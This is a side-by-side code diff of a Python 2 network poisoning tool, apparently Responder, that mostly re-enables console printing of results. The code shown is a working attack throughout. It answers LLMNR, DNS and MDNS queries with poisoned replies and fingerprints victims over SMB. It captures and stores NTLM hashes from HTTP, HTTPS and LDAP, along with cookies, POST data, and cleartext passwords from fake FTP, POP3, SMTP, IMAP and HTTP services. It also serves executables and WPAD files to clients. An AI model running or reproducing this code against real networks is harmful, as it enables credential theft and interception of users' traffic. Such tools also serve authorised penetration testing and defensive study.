if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
@ -1298,17 +1300,17 @@ class LLMNR(BaseRequestHandler):
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) == False: if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
@ -1318,17 +1320,17 @@ class LLMNR(BaseRequestHandler):
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
@ -1385,7 +1387,7 @@ class DNS(BaseRequestHandler):
buff = DNSAns() buff = DNSAns()
buff.calculate(data) buff.calculate(data)
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
#print "DNS Answer sent to: %s "%(self.client_address[0]) print "DNS Answer sent to: %s "%(self.client_address[0])
logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) logging.warning('DNS Answer sent to: %s'%(self.client_address[0]))
class DNSTCP(BaseRequestHandler): class DNSTCP(BaseRequestHandler):
@ -1399,7 +1401,7 @@ class DNSTCP(BaseRequestHandler):
buff = DNSAns() buff = DNSAns()
buff.calculate(data) buff.calculate(data)
self.request.send(str(buff)) self.request.send(str(buff))
#print "DNS Answer sent to: %s "%(self.client_address[0]) print "DNS Answer sent to: %s "%(self.client_address[0])
logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) logging.warning('DNS Answer sent to: %s'%(self.client_address[0]))
except Exception: except Exception:
@ -1454,14 +1456,14 @@ class MDNS(BaseRequestHandler):
try: try:
if Analyze(AnalyzeMode): if Analyze(AnalyzeMode):
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
#print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
if RespondToSpecificHost(RespondTo): if RespondToSpecificHost(RespondTo):
if Analyze(AnalyzeMode) == False: if Analyze(AnalyzeMode) == False:
if RespondToIPScope(RespondTo, self.client_address[0]): if RespondToIPScope(RespondTo, self.client_address[0]):
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data) Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName = Name) MDns = MDNSAns(AnswerName = Name)
@ -1470,7 +1472,7 @@ class MDNS(BaseRequestHandler):
if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data) Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName = Name) MDns = MDNSAns(AnswerName = Name)
@ -1506,14 +1508,14 @@ def ParseHTTPHash(data,client):
outfile = os.path.join(ResponderPATH,"HTTP-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTP-NTLMv1-Client-"+client+".txt")
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
if PrintData(outfile,User+"::"+Hostname): if PrintData(outfile,User+"::"+Hostname):
#print "[+]HTTP NTLMv1 hash captured from :",client print "[+]HTTP NTLMv1 hash captured from :",client
#print "Hostname is :", Hostname print "Hostname is :", Hostname
#print "Complete hash is : ", WriteHash print "Complete hash is : ", WriteHash
WriteData(outfile,WriteHash, User+"::"+Hostname) WriteData(outfile,WriteHash, User+"::"+Hostname)
logging.warning('HTTP NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]HTTP NTLMv1 hash captured from :%s'%(client))
logging.warning('HTTP NTLMv1 Hostname is :%s'%(Hostname)) logging.warning('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
logging.warning('HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
logging.warning('HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
if NthashLen > 24: if NthashLen > 24:
NthashLen = 64 NthashLen = 64
@ -1529,19 +1531,19 @@ def ParseHTTPHash(data,client):
outfile = os.path.join(ResponderPATH,"HTTP-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTP-NTLMv2-Client-"+client+".txt")
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("HTTP NTLMv2 hash captured from :",client) print "[+]HTTP NTLMv2 hash captured from :",client
logging.warning("Complete hash is : ", WriteHash) print "Complete hash is : ", WriteHash
WriteData(outfile,WriteHash, User+"::"+Domain) WriteData(outfile,WriteHash, User+"::"+Domain)
logging.warning('HTTP NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client))
logging.warning('HTTP NTLMv2 User is : %s'%(User)) logging.warning('[+]HTTP NTLMv2 User is : %s'%(User))
logging.warning('HTTP NTLMv2 Domain is :%s'%(Domain)) logging.warning('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
logging.warning('HTTP NTLMv2 Hostname is :%s'%(HostName)) logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
logging.warning('HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
def GrabCookie(data,host): def GrabCookie(data,host):
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data) Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
if Cookie: if Cookie:
CookieStr = "HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
logging.warning(CookieStr) logging.warning(CookieStr)
return Cookie.group(0) return Cookie.group(0)
else: else:
@ -1572,7 +1574,7 @@ def Basic_Ntlm(Basic):
return IIS_Auth_401_Ans() return IIS_Auth_401_Ans()
def ServeEXE(data,client, Filename): def ServeEXE(data,client, Filename):
Message = "Sent %s file sent to: %s."%(Filename,client) Message = "[+]Sent %s file sent to: %s."%(Filename,client)
logging.warning(Message) logging.warning(Message)
with open (Filename, "rb") as bk: with open (Filename, "rb") as bk:
data = bk.read() data = bk.read()
@ -1603,17 +1605,17 @@ def GrabURL(data, host):
POST = re.findall('(?<=POST )[^HTTP]*', data) POST = re.findall('(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data) POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET: if GET:
HostStr = "HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET))
logging.warning(HostStr) logging.warning(HostStr)
#print HostStr print HostStr
if POST: if POST:
Host3Str = "HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST))
logging.warning(Host3Str) logging.warning(Host3Str)
#print Host3Str print Host3Str
if len(''.join(POSTDATA)) >2: if len(''.join(POSTDATA)) >2:
PostData = 'The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
#print PostData print PostData
logging.warning(PostData) logging.warning(PostData)
#Handle HTTP packet sequence. #Handle HTTP packet sequence.
@ -1652,10 +1654,9 @@ def PacketSequence(data,client):
NTLM_Auth= b64decode(''.join(Ntlm)) NTLM_Auth= b64decode(''.join(Ntlm))
ParseHTTPHash(NTLM_Auth,client) ParseHTTPHash(NTLM_Auth,client)
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
Message = "WPAD (auth) file sent to: %s"%(client) Message = "[+]WPAD (auth) file sent to: %s"%(client)
if Verbose: if Verbose:
#print Message print Message
logging.warning(Message)
logging.warning(Message) logging.warning(Message)
buffer1 = WpadCustom(data,client) buffer1 = WpadCustom(data,client)
return buffer1 return buffer1
@ -1669,13 +1670,13 @@ def PacketSequence(data,client):
GrabURL(data,client) GrabURL(data,client)
outfile = os.path.join(ResponderPATH,"HTTP-Clear-Text-Password-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTP-Clear-Text-Password-"+client+".txt")
if PrintData(outfile,b64decode(''.join(BasicAuth))): if PrintData(outfile,b64decode(''.join(BasicAuth))):
logging.warning("HTTP-User & Password:", b64decode(''.join(BasicAuth))) print "[+]HTTP-User & Password:", b64decode(''.join(BasicAuth))
WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
logging.warning('HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
Message = "WPAD (auth) file sent to: %s"%(client) Message = "[+]WPAD (auth) file sent to: %s"%(client)
if Verbose: if Verbose:
logging.warning(Message) print Message
logging.warning(Message) logging.warning(Message)
buffer1 = WpadCustom(data,client) buffer1 = WpadCustom(data,client)
return buffer1 return buffer1
@ -1697,10 +1698,9 @@ class HTTP(BaseRequestHandler):
data = self.request.recv(8092) data = self.request.recv(8092)
buff = WpadCustom(data,self.client_address[0]) buff = WpadCustom(data,self.client_address[0])
if buff and WpadForcedAuth(Force_WPAD_Auth) == False: if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
Message = "WPAD (no auth) file sent to: %s"%(self.client_address[0]) Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
if Verbose: if Verbose:
#print Message print Message
logging.warning(Message)
logging.warning(Message) logging.warning(Message)
self.request.send(buff) self.request.send(buff)
else: else:
@ -1923,48 +1923,48 @@ def ParseHTTPSHash(data,client):
NthashOffset = struct.unpack('<H',data[24:26])[0] NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
if NthashLen == 24: if NthashLen == 24:
#print "[+]HTTPS NTLMv1 hash captured from :",client print "[+]HTTPS NTLMv1 hash captured from :",client
logging.warning('HTTPS NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]HTTPS NTLMv1 hash captured from :%s'%(client))
NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
HostNameLen = struct.unpack('<H',data[46:48])[0] HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] HostNameOffset = struct.unpack('<H',data[48:50])[0]
Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','') Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
#print "Hostname is :", Hostname print "Hostname is :", Hostname
logging.warning('HTTPS NTLMv1 Hostname is :%s'%(Hostname)) logging.warning('[+]HTTPS NTLMv1 Hostname is :%s'%(Hostname))
UserLen = struct.unpack('<H',data[36:38])[0] UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0] UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','') User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
#print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','') print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
logging.warning('HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv1-Client-"+client+".txt")
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
WriteData(outfile,WriteHash, User+"::"+Hostname) WriteData(outfile,WriteHash, User+"::"+Hostname)
#print "Complete hash is : ", WriteHash print "Complete hash is : ", WriteHash
logging.warning('HTTPS NTLMv1 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTPS NTLMv1 Complete hash is :%s'%(WriteHash))
if NthashLen > 24: if NthashLen > 24:
#print "[+]HTTPS NTLMv2 hash captured from :",client print "[+]HTTPS NTLMv2 hash captured from :",client
logging.warning('HTTPS NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]HTTPS NTLMv2 hash captured from :%s'%(client))
NthashLen = 64 NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0] DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0] DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','') Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
#print "Domain is : ", Domain print "Domain is : ", Domain
logging.warning('HTTPS NTLMv2 Domain is :%s'%(Domain)) logging.warning('[+]HTTPS NTLMv2 Domain is :%s'%(Domain))
UserLen = struct.unpack('<H',data[36:38])[0] UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0] UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','') User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
#print "User is :", User print "User is :", User
logging.warning('HTTPS NTLMv2 User is : %s'%(User)) logging.warning('[+]HTTPS NTLMv2 User is : %s'%(User))
HostNameLen = struct.unpack('<H',data[44:46])[0] HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','') HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
#print "Hostname is :", HostName print "Hostname is :", HostName
logging.warning('HTTPS NTLMv2 Hostname is :%s'%(HostName)) logging.warning('[+]HTTPS NTLMv2 Hostname is :%s'%(HostName))
outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv2-Client-"+client+".txt")
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
WriteData(outfile,WriteHash, User+"::"+Domain) WriteData(outfile,WriteHash, User+"::"+Domain)
#print "Complete hash is : ", WriteHash print "Complete hash is : ", WriteHash
logging.warning('HTTPS NTLMv2 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTPS NTLMv2 Complete hash is :%s'%(WriteHash))
#Handle HTTPS packet sequence. #Handle HTTPS packet sequence.
def HTTPSPacketSequence(data,client): def HTTPSPacketSequence(data,client):
@ -1989,8 +1989,8 @@ def HTTPSPacketSequence(data,client):
GrabCookie(data,client) GrabCookie(data,client)
outfile = os.path.join(ResponderPATH,"HTTPS-Clear-Text-Password-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTPS-Clear-Text-Password-"+client+".txt")
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b))) WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
#print "[+]HTTPS-User & Password:", b64decode(''.join(b)) print "[+]HTTPS-User & Password:", b64decode(''.join(b))
logging.warning('HTTPS-User & Password: %s'%(b64decode(''.join(b)))) logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe)) buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
return buffer1 return buffer1
@ -2055,8 +2055,8 @@ class FTP(BaseRequestHandler):
data = self.request.recv(1024) data = self.request.recv(1024)
if data[0:4] == "USER": if data[0:4] == "USER":
User = data[5:].replace("\r\n","") User = data[5:].replace("\r\n","")
#print "[+]FTP User: ", User print "[+]FTP User: ", User
logging.warning('FTP User: %s'%(User)) logging.warning('[+]FTP User: %s'%(User))
t = FTPPacket(Code="331",Message="User name okay, need password.") t = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2064,8 +2064,8 @@ class FTP(BaseRequestHandler):
Pass = data[5:].replace("\r\n","") Pass = data[5:].replace("\r\n","")
Outfile = os.path.join(ResponderPATH,"FTP-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"FTP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,User+":"+Pass, User+":"+Pass) WriteData(Outfile,User+":"+Pass, User+":"+Pass)
#print "[+]FTP Password is: ", Pass print "[+]FTP Password is: ", Pass
logging.warning('FTP Password is: %s'%(Pass)) logging.warning('[+]FTP Password is: %s'%(Pass))
t = FTPPacket(Code="530",Message="User not logged in.") t = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2110,11 +2110,11 @@ def ParseLDAPHash(data,client):
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
Outfile = os.path.join(ResponderPATH,"LDAP-NTLMv1-"+client+".txt") Outfile = os.path.join(ResponderPATH,"LDAP-NTLMv1-"+client+".txt")
WriteData(Outfile,writehash,User+"::"+Domain) WriteData(Outfile,writehash,User+"::"+Domain)
#print "[LDAP] NTLMv1 complete hash is :", writehash print "[LDAP] NTLMv1 complete hash is :", writehash
logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash)) logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
if LMhashLen <2 : if LMhashLen <2 :
Message = 'LDAP Anonymous NTLM authentication, ignoring..' Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
#print Message print Message
logging.warning(Message) logging.warning(Message)
def ParseNTLM(data,client): def ParseNTLM(data,client):
@ -2142,7 +2142,7 @@ def ParseLDAPPacket(data,client):
if AuthHeaderType == "\x80": if AuthHeaderType == "\x80":
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0] PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen] Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
#print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
outfile = os.path.join(ResponderPATH,"LDAP-Clear-Text-Password-"+client+".txt") outfile = os.path.join(ResponderPATH,"LDAP-Clear-Text-Password-"+client+".txt")
WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password)) WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password)) logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password))
@ -2153,7 +2153,7 @@ def ParseLDAPPacket(data,client):
buff = ParseSearch(data) buff = ParseSearch(data)
return buff return buff
else: else:
logging.warning('[LDAP]Operation not supported') print '[LDAP]Operation not supported'
#LDAP Server Class #LDAP Server Class
class LDAP(BaseRequestHandler): class LDAP(BaseRequestHandler):
@ -2187,7 +2187,7 @@ class POP(BaseRequestHandler):
data = self.request.recv(1024) data = self.request.recv(1024)
if data[0:4] == "USER": if data[0:4] == "USER":
User = data[5:].replace("\r\n","") User = data[5:].replace("\r\n","")
logging.warning('POP3 User: %s'%(User)) logging.warning('[+]POP3 User: %s'%(User))
t = POPOKPacket() t = POPOKPacket()
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2195,8 +2195,8 @@ class POP(BaseRequestHandler):
Pass = data[5:].replace("\r\n","") Pass = data[5:].replace("\r\n","")
Outfile = os.path.join(ResponderPATH,"POP3-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"POP3-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,User+":"+Pass, User+":"+Pass) WriteData(Outfile,User+":"+Pass, User+":"+Pass)
#print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass) print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)
logging.warning("POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)) logging.warning("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass))
t = POPOKPacket() t = POPOKPacket()
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2233,8 +2233,8 @@ class ESMTP(BaseRequestHandler):
Password = b64decode(data[:len(data)-2]) Password = b64decode(data[:len(data)-2])
Outfile = os.path.join(ResponderPATH,"SMTP-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"SMTP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,Username+":"+Password, Username+":"+Password) WriteData(Outfile,Username+":"+Password, Username+":"+Password)
#print "SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
logging.warning("SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)) logging.warning("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password))
except Exception: except Exception:
pass pass
@ -2260,8 +2260,8 @@ class IMAP(BaseRequestHandler):
Credentials = data[10:].strip() Credentials = data[10:].strip()
Outfile = os.path.join(ResponderPATH,"IMAP-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"IMAP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,Credentials, Credentials) WriteData(Outfile,Credentials, Credentials)
#print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials) print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
logging.warning('IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)) logging.warning('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials))
self.request.send(str(ditchthisconnection())) self.request.send(str(ditchthisconnection()))
data = self.request.recv(1024) data = self.request.recv(1024)